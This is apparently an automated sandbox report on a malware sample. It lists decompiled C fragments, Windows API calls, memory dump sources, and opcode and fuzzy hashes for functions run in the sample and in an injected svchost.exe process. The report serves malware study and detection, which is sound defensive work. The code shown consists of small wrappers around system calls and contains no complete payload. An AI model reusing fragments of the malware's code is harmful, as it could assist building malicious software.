API String ID:
Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
Instruction ID: 8d10d9d25de9ec3e6def201a299ec9bf42c948c309616648182b8fd41abd7787
Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
Instruction Fuzzy Hash: 54212BB2D442085BCB11E6609D42BFF736C9B54304F04017FE989A2181FA38AB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 00418912, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948

Strings

E|@D, xrefs: 00418972, 0041897F

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID: E|@D
API String ID: 621844428-1370303659
Opcode ID: 66a796d0ebfff3f9d5785c6ed58b8e05b27a6136a39288f6f4f9432df0981e0b
Instruction ID: e895c59ff5785fe79b81943ebcb3a64fc83d15124883f7b35492da766616fb8c
Opcode Fuzzy Hash: 66a796d0ebfff3f9d5785c6ed58b8e05b27a6136a39288f6f4f9432df0981e0b
Instruction Fuzzy Hash: 2B11F5B6211208BBDB18DF99CC85EEB77A9AF8C754F158258FE4D97241C630E940CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188b7
0x004188c2
0x004188cd
0x004188d1

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD

Strings

&5A, xrefs: 004188C2, 004188CC

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A130( &_v67, 0, 0x3f);
				E0041AD10( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407270
0x0040727f
0x00407283
0x0040728e
0x0040729e
0x004072ae
0x004072b3
0x004072ba
0x004072bd
0x004072ca
0x004072cc
0x004072ce
0x004072eb
0x004072eb
0x00000000
0x004072ed
0x004072f2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction ID: c56ba0c085939b8c42c795c32c14b578f190c8095243a7543fabada8e08a803b
Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction Fuzzy Hash: 13018431A8022877E720AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA

Uniqueness

Uniqueness Score: -1.00%

Function 004188D2, Relevance: 1.5, APIs: 1, Instructions: 31
memoryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E004188D2(void* __eax, unsigned int __ebx, signed int __ecx, void* __edi, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				intOrPtr _t10;
				char _t14;
				void* _t24;

				_t24 = __edi + 0xffffffc6;
				_t10 = (__ebx >> __ecx) + 1;
				asm("lodsd");
				asm("rep lodsd");
				_push(_t10);
				 *0x8b55a8e4 = _t10;
				_t11 = _v0;
				_t4 = _t11 + 0xc74; // 0xc74
				E004191D0(_t24, _v0, _t4,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t14;
			}

0x004188d4
0x004188d8
0x004188d9
0x004188da
0x004188dc
0x004188dd
0x004188e3
0x004188ef
0x004188f7
0x0041890d
0x00418911

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 67d82495b4063692c91892c48db61b0093108501fc37c852910822e860be5df8
Instruction ID: d0155fad79ad0b948d62ddc79bec75bb1eaa1d629c12d81e7d1ba5b31236321b
Opcode Fuzzy Hash: 67d82495b4063692c91892c48db61b0093108501fc37c852910822e860be5df8
Instruction Fuzzy Hash: 86F0A9B1240604AFDB04CF28CC48EE737ADEF89320F144219B91ECB282C230E9018AB0

Uniqueness

Uniqueness Score: -1.00%

Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004188ef
0x004188f7
0x0041890d
0x00418911

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a5a
0x00418a70
0x00418a74

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418920(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418923
0x0041893a
0x00418948

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041625A, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd9626dc1f7a7d480f5fa0fa4dadd97e85d0233cc0bdc983d065c8ff21923f8c
Instruction ID: d8d736f80c120d99af92767b070d3f73c40cfad4e4bc8d79b82cf363fc090f77
Opcode Fuzzy Hash: dd9626dc1f7a7d480f5fa0fa4dadd97e85d0233cc0bdc983d065c8ff21923f8c
Instruction Fuzzy Hash: CA018E767496804BC3528E7DDCC41DEFB57BBC226071405AEE0909F681D6218047C3A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3D2, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 188eb92cc5218b2bc821d0e6f3f127cf7965abec9c6822a5f14355cade1b807b
Instruction ID: ea5f96915f6c7f619361df7a1f506267b992d222be2908fc3088c97ecacb800d
Opcode Fuzzy Hash: 188eb92cc5218b2bc821d0e6f3f127cf7965abec9c6822a5f14355cade1b807b
Instruction Fuzzy Hash: DBF04636B142911AC3129FBEBC529E5FB649BC2324F0446EFE488E7183D621811C87A8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 1972 Parent PID: 3440 svchost.exeCOMMON

Executed Functions

Function 005A85CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,005A3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,005A3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 005A861D

Strings

.z`, xrefs: 005A860D, 005A8618

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 3e423702255ab8f3850fb248a0caa070f0043465ee08bb6088e916a5cca17d32
Instruction ID: 48389cb713b9971bbd403d637a104ee6f75fcc0262dc6bbbbd0526efa1b01011
Opcode Fuzzy Hash: 3e423702255ab8f3850fb248a0caa070f0043465ee08bb6088e916a5cca17d32
Instruction Fuzzy Hash: 0501BDB2204208AFDB48CF88DC95EEB37EDAF8C754F158258BA0DD7241D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005A85D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,005A3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,005A3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 005A861D

Strings

.z`, xrefs: 005A860D, 005A8618

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 4bb86ea8383b03519551172d4cbf69cdecb02c3ff590e90d57e3704344539712
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 84F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 005A867C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:Z,FFFFFFFF,?,b=Z,?,00000000), ref: 005A86C5

Strings

!:Z, xrefs: 005A869C, 005A86A8

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: !:Z
API String ID: 2738559852-1759089494
Opcode ID: fb08f70ddd354952e7caf65d046407b2731cd27fc48768cb9aafaba92d35f217
Instruction ID: ef795fa67c59ed6b0ccfab851a719518608b3988403d4461ea5b5e1dfae97f90
Opcode Fuzzy Hash: fb08f70ddd354952e7caf65d046407b2731cd27fc48768cb9aafaba92d35f217
Instruction Fuzzy Hash: 84F0F4B2200108ABCB08DF88DC84EEB77A9AF8C714F118248BE0D97241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005A8680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:Z,FFFFFFFF,?,b=Z,?,00000000), ref: 005A86C5

Strings

!:Z, xrefs: 005A869C, 005A86A8

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: !:Z
API String ID: 2738559852-1759089494
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 7391f592d13e6cc574539accf981b758524ba9999b8caa040ad36ea59e836bee
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: B7F0A4B2200209ABCB18DF89DC85EEB77ADAF8C754F158248BE1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005A86FB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(@=Z,?,?,005A3D40,00000000,FFFFFFFF), ref: 005A8725

Strings

@=Z, xrefs: 005A871C, 005A8724

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: @=Z
API String ID: 3535843008-1854776454
Opcode ID: 26563e9e44d9bab3f41716252c4c8375b9e930966a4ffb389a63d2586c7c3df0
Instruction ID: f309c9b8d8f1616513bba9838ab9ea0b9df37640277b1c14bb46b8c2ae76b18e
Opcode Fuzzy Hash: 26563e9e44d9bab3f41716252c4c8375b9e930966a4ffb389a63d2586c7c3df0
Instruction Fuzzy Hash: 33E0C235304214AFE714EF98CC49E9B3B68EF88320F004458FE085B242C530E500C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 005A8700, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(@=Z,?,?,005A3D40,00000000,FFFFFFFF), ref: 005A8725

Strings

@=Z, xrefs: 005A871C, 005A8724

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: @=Z
API String ID: 3535843008-1854776454
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 4941a7a562a8812864c7dd396cf3cd7b464cb7db361513c908d4d00ed1843df8
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: B7D012752002146BD714EB98CC49E977B5CEF84750F154455BA185B242C570F500C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 005A87B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00592D11,00002000,00003000,00000004), ref: 005A87E9

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 4a8e208fba5cf03d7d2be2df52e421f3e41af83633b27f7b8e1d2d572b746e2c
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: AAF015B2200219ABCB18DF89CC85EAB77ADAF88750F118148BE0897241C630F810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 005A87AC, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00592D11,00002000,00003000,00000004), ref: 005A87E9

Memory Dump Source

Source File: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Offset: 00590000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 6e5cde00e7fd1c25f4468e484f6a1eb2673e9a8e29ad29c7851185cd71188427
Instruction ID: 99aeb9b3d740052c1590d5ad790306e8ad843f40c1c73df45833905110d235eb
Opcode Fuzzy Hash: 6e5cde00e7fd1c25f4468e484f6a1eb2673e9a8e29ad29c7851185cd71188427
Instruction Fuzzy Hash: 5CF015B6200119ABDB18DF88DC85EEB77ADAF88350F118549BE08A7241D630E810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 03469710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0346971A

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0a122c963a61919018644b4999afc533fd462f75f3d9242780d4e52afc15d894
Instruction ID: 6c700813036fda15f0d2e4fafc4bb2343a6d095cdb285efbf5418c230b6f0fb0
Opcode Fuzzy Hash: 0a122c963a61919018644b4999afc533fd462f75f3d9242780d4e52afc15d894
Instruction Fuzzy Hash: 3890027161104806E100A5A9540868600059BE1341F51D012A5015955EC7A588917175

Uniqueness

Uniqueness Score: -1.00%

Function 03469FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03469FEA

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d8eced7ba91e6e89b4324036836b9a5029556e63cebd3aeca0cc3d3fbb149bb4
Instruction ID: edf248748426d2ec0d7f5fc390d729b25af113572ab2956de6c7d4be0b7facf3
Opcode Fuzzy Hash: d8eced7ba91e6e89b4324036836b9a5029556e63cebd3aeca0cc3d3fbb149bb4
Instruction Fuzzy Hash: 7090027172118806E110A169840474600059BD2241F51C412A0815958D87D588917166

Uniqueness

Uniqueness Score: -1.00%

Function 03469780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0346978A

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7d1d5d26a38ed3e4053779a80975f4bccf6e03ddec2d00a9a9e378b4f9cd8a1e
Instruction ID: c3542da5ff0274f083d4747691c791448eba2317ac09cbaf04da808fb45f567a
Opcode Fuzzy Hash: 7d1d5d26a38ed3e4053779a80975f4bccf6e03ddec2d00a9a9e378b4f9cd8a1e
Instruction Fuzzy Hash: B790026962304406E180B169540864A00059BD2242F91D416A0006958CCB5588696365

Uniqueness

Uniqueness Score: -1.00%

Function 03469650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0346965A

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 52fd59a00790f581183b0ec7b02e9b63e48fea48adf57af506ab8a9a85ad086b
Instruction ID: f099cbc4cb6e0569d9ee2a0d0d0ac859f123c6f85c2f06821e819d0db01813f7
Opcode Fuzzy Hash: 52fd59a00790f581183b0ec7b02e9b63e48fea48adf57af506ab8a9a85ad086b
Instruction Fuzzy Hash: 6890027161508C46E140B1694404A8600159BD1345F51C012A0055A94D97658D55B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 03469A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03469A5A

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31271d6d8a55b1c6b7c6ca4eaf2c9e0a26fc74350fa5f7b160844e81ff9154a4
Instruction ID: 8d645ecf9c3628258cb2ca7266458f965db980abad0d7dbc3e2009c5cf96648c
Opcode Fuzzy Hash: 31271d6d8a55b1c6b7c6ca4eaf2c9e0a26fc74350fa5f7b160844e81ff9154a4
Instruction Fuzzy Hash: AE90026162184446E200A5794C14B4700059BD1343F51C116A0145954CCB5588616565

Uniqueness

Uniqueness Score: -1.00%

Function 03469660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0346966A

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e2bdeaf160ba4e8a75bb8cbc01025680fc3cc67d5a339625c122431c3610cfe
Instruction ID: 3ddb0b5fe6e8357961c3619329b470e45316d582d90af8c213139464a8021c1e
Opcode Fuzzy Hash: 4e2bdeaf160ba4e8a75bb8cbc01025680fc3cc67d5a339625c122431c3610cfe
Instruction Fuzzy Hash: C590027161104C06E180B169440468A00059BD2341F91C016A0016A54DCB558A5977E5

Uniqueness

Uniqueness Score: -1.00%

Function 034696D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 034696DA

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a135f7ece845bbfd4a315457ddd9002bd229999205ae18278083d021beaa7978
Instruction ID: c192c8b09b3091f385dec31a72fd70a07cdc3b9a9927f7f660a428cea9f11ec6
Opcode Fuzzy Hash: a135f7ece845bbfd4a315457ddd9002bd229999205ae18278083d021beaa7978
Instruction Fuzzy Hash: F690027161104C46E100A1694404B8600059BE1341F51C017A0115A54D8755C8517565

Uniqueness

Uniqueness Score: -1.00%

Function 034696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 034696EA

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 422aa480db2f2d9ea9496271b43a378570feaf67a5ae0bb2f32bd8acabf3c5ea
Instruction ID: d560fb11157220cce11041b08f81ceb93b34b34cc2aa5b4341b25110b8f37bee
Opcode Fuzzy Hash: 422aa480db2f2d9ea9496271b43a378570feaf67a5ae0bb2f32bd8acabf3c5ea
Instruction Fuzzy Hash: 869002716110CC06E110A169840478A00059BD1341F55C412A4415A58D87D588917165

Uniqueness

Uniqueness Score: -1.00%

Function 03469540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0346954A

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ee2dacce31ce40bfe94d50b8a5700d935f59d03ff6d1d170201f951d9357499
Instruction ID: 5b28eb8de60928031096985bb38f5e10599815e238b8e87ab2d5f71583eea9f1
Opcode Fuzzy Hash: 4ee2dacce31ce40bfe94d50b8a5700d935f59d03ff6d1d170201f951d9357499
Instruction Fuzzy Hash: AD900265621044071105E569070454700469BD6391351C022F1006950CD76188616165

Uniqueness

Uniqueness Score: -1.00%

Function 03469910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0346991A

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 729217c8818f1654dfdda5500bcc36c6cb588d05319f6a61d64e9c58bc2a0c71
Instruction ID: 7b45f16a481a93e5e6a341fe67e2e9de269197f5fe190fdda38bac1ec1af938c
Opcode Fuzzy Hash: 729217c8818f1654dfdda5500bcc36c6cb588d05319f6a61d64e9c58bc2a0c71
Instruction Fuzzy Hash: CF9002B161104806E140B169440478600059BD1341F51C012A5055954E87998DD576A9

Uniqueness

Uniqueness Score: -1.00%

Function 034695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

